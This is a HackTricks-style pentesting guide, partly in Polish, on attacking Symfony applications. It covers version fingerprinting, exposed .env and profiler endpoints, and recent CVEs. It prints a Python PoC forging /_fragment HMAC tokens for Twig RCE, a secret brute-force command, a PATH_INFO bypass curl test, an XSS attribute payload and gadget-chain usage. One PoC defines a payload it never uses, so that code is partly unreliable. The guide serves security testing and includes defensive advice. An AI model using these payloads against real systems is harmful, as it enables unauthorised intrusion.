Symfony

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

Symfony jest jednym z najczęściej używanych frameworków PHP i regularnie pojawia się w ocenach celów enterprise, e-commerce i CMS (Drupal, Shopware, Ibexa, OroCRM … wszystkie osadzają komponenty Symfony). Ta strona zbiera wskazówki ofensywne, typowe błędy konfiguracji i ostatnie podatności, które powinieneś mieć na swojej liście kontrolnej po wykryciu aplikacji Symfony.

Uwaga historyczna: Duża część ekosystemu wciąż działa na gałęzi 5.4 LTS (EOL listopad 2025). Symfony 7.4 stało się nowym LTS w listopadzie 2025 i będzie otrzymywać poprawki bezpieczeństwa do listopada 2029. Zawsze sprawdzaj dokładny poziom patcha, ponieważ wiele advisory z 2024‑2026 zostało naprawionych tylko w micro‑release’ach.

Recon & Enumeration

Finger-printing

  • HTTP response headers: X-Powered-By: Symfony, X-Debug-Token, X-Debug-Token-Link or cookies starting with sf_redirect, sf_session, MOCKSESSID.
  • Source code leaks (composer.json, composer.lock, /vendor/…) often reveal the exact version:
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
  • Public routes that only exist on Symfony:
  • /_profiler (Symfony Profiler & debug toolbar)
  • /_wdt/<token> (“Web Debug Toolbar”)
  • /_error/{code}.{_format} (pretty error pages)
  • /app_dev.php, /config.php, /config_dev.php (pre-4.0 dev front-controllers)
  • Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: symfony.txt → look for /_fragment, /_profiler, .env, .htaccess.

Interesting files & endpoints

PathDlaczego ma znaczenie
/.env, /.env.local, /.env.prodFrequently mis-deployed → leaks APP_SECRET, DB creds, SMTP, AWS keys
/.git, .svn, .hgSource disclosure → credentials + business logic
/var/log/*.log, /log/dev.logWeb-root mis-configuration exposes stack-traces
/_profilerFull request history, configuration, service container, APP_SECRET (≤ 3.4)
/_fragmentEntry point used by ESI/HInclude. Abuse possible once you know APP_SECRET
/vendor/phpunit/phpunit/phpunitPHPUnit RCE if accessible (CVE-2017-9841)
/index.php/_error/{code}Finger-print & sometimes leak exception traces

High-impact Vulnerabilities

1. APP_SECRET disclosure ➜ RCE via /_fragment (aka “secret-fragment”)

  • CVE-2019-18889 originally, but still appears on modern targets when debug is left enabled or .env is exposed.
  • Once you know the 32-char APP_SECRET, craft an HMAC token and abuse the internal render() controller to execute arbitrary Twig:
# PoC – requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}"   # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
  • Excellent write-up & exploitation script: Ambionics blog (linked in References).

2. PATH_INFO auth bypass – CVE-2025-64500 (HttpFoundation)

  • Affects versions below 5.4.50, 6.4.29 and 7.3.7. Path normalization could drop the leading /, breaking access-control rules that assume /admin etc.
  • Quick test: curl -H 'PATH_INFO: admin/secret' https://target/index.php → if it reaches admin routes without auth, you found it.
  • Patch by upgrading symfony/http-foundation or the full framework to the fixed patch level.

3. MSYS2/Git-Bash argument mangling – CVE-2026-24739 (Process)

  • Affects versions below 5.4.51, 6.4.33, 7.3.11, 7.4.5 and 8.0.5 on Windows when PHP is run from MSYS2 (Git-Bash, mingw). Process fails to quote = leading to corrupted paths; destructive commands (rmdir, del) may target unintended dirs.
  • If you can upload a PHP script or influence Composer/CLI helpers that call Process, craft arguments with = (e.g. E:/=tmp/delete) to cause path re-write.

4. Runtime env/argv injection – CVE-2024-50340 (Runtime)

  • When register_argv_argc=On and using non-SAPI runtimes, crafted query strings could flip APP_ENV/APP_DEBUG via argv parsing. Patched in 5.4.46/6.4.14/7.1.7.
  • Look for /?--env=prod or similar being accepted in logs.

5. URL validation / open redirect – CVE-2024-50345 (HttpFoundation)

  • Special characters in the URI were not validated the same way browsers do, enabling redirect to attacker-controlled domains. Fixed in 5.4.46/6.4.14/7.1.7.

6. Symfony UX attribute injection – CVE-2025-47946

  • symfony/ux-twig-component & symfony/ux-live-component before 2.25.1 render {{ attributes }} without escaping → attribute injection/XSS. If the app lets users define component attributes (admin CMS, email templating) you can chain to script injection.
  • Update both packages to 2.25.1+. As a manual exploit, place JS in an attribute value passed to a custom component and trigger rendering.

7. Windows Process Hijack – CVE-2024-51736 (Process)

  • The Process component searched the current working directory before PATH on Windows. An attacker able to upload tar.exe, cmd.exe, etc. in a writable web-root and trigger Process (e.g. file extraction, PDF generation) gains command execution.
  • Patched in 5.4.50, 6.4.14, 7.1.7.

8. Session-Fixation – CVE-2023-46733

  • Authentication guard reused an existing session ID after login. If an attacker sets the cookie before the victim authenticates, they hijack the account post-login.

9. Twig sandbox XSS – CVE-2023-46734

  • In applications that expose user-controlled templates (admin CMS, email builder) the nl2br filter could be abused to bypass the sandbox and inject JS.

10. Symfony 1 gadget chains (still found in legacy apps)

  • phpggc symfony/1 system id produces a Phar payload that triggers RCE when an unserialize() happens on classes such as sfNamespacedParameterHolder. Check file-upload endpoints and phar:// wrappers.

PHP - Deserialization + Autoload Classes

Exploitation Cheat-Sheet

Calculate HMAC token for /_fragment

python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"

Bruteforce słabego APP_SECRET

cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target

RCE przez odsłonięty Symfony Console

Jeśli bin/console jest osiągalny przez php-fpm lub bezpośrednie przesłanie przez CLI:

php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup

Użyj deserialization gadgets w katalogu cache lub napisz złośliwy szablon Twig, który zostanie wykonany przy następnym żądaniu.

Szybko sprawdź PATH_INFO bypass (CVE-2025-64500)

curl -i -H 'PATH_INFO: admin/secret' https://target/index.php
# If it returns protected content without redirect/auth, the Request normalization is vulnerable.

Wstrzyknięcie atrybutu Spray UX (CVE-2025-47946)

{# attacker-controlled attribute value #}
<live:button {{ attributes|merge({'onclick':'alert(1)'}) }} />

Jeśli renderowany output wypisuje atrybut bez escapingu, dochodzi do XSS. Zaktualizuj do 2.25.1+.

Notatki obronne

  1. Nigdy nie wdrażaj debuga (APP_ENV=dev, APP_DEBUG=1) na produkcji; zablokuj /app_dev.php, /_profiler, /_wdt w konfiguracji serwera WWW.
  2. Przechowuj sekrety w zmiennych środowiskowych lub vault/secrets.local.php, nigdy w plikach dostępnych przez document-root.
  3. Wymagaj zarządzania poprawkami – subskrybuj Symfony security advisories i utrzymuj przynajmniej poziom patchy LTS (5.4.x do listopada 2025, 6.4 do listopada 2027, 7.4 do listopada 2029).
  4. Jeśli działasz na Windows, zaktualizuj natychmiast, aby złagodzić CVE-2024-51736 & CVE-2026-24739 lub dodaj open_basedir/disable_functions jako defence-in-depth.

Przydatne narzędzia ofensywne

  • ambionics/symfony-exploits – secret-fragment RCE, debugger routes discovery.
  • phpggc – Ready-made gadget chains for Symfony 1 & 2.
  • sf-encoder – small helper to compute _fragment HMAC (Go implementation).

References

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks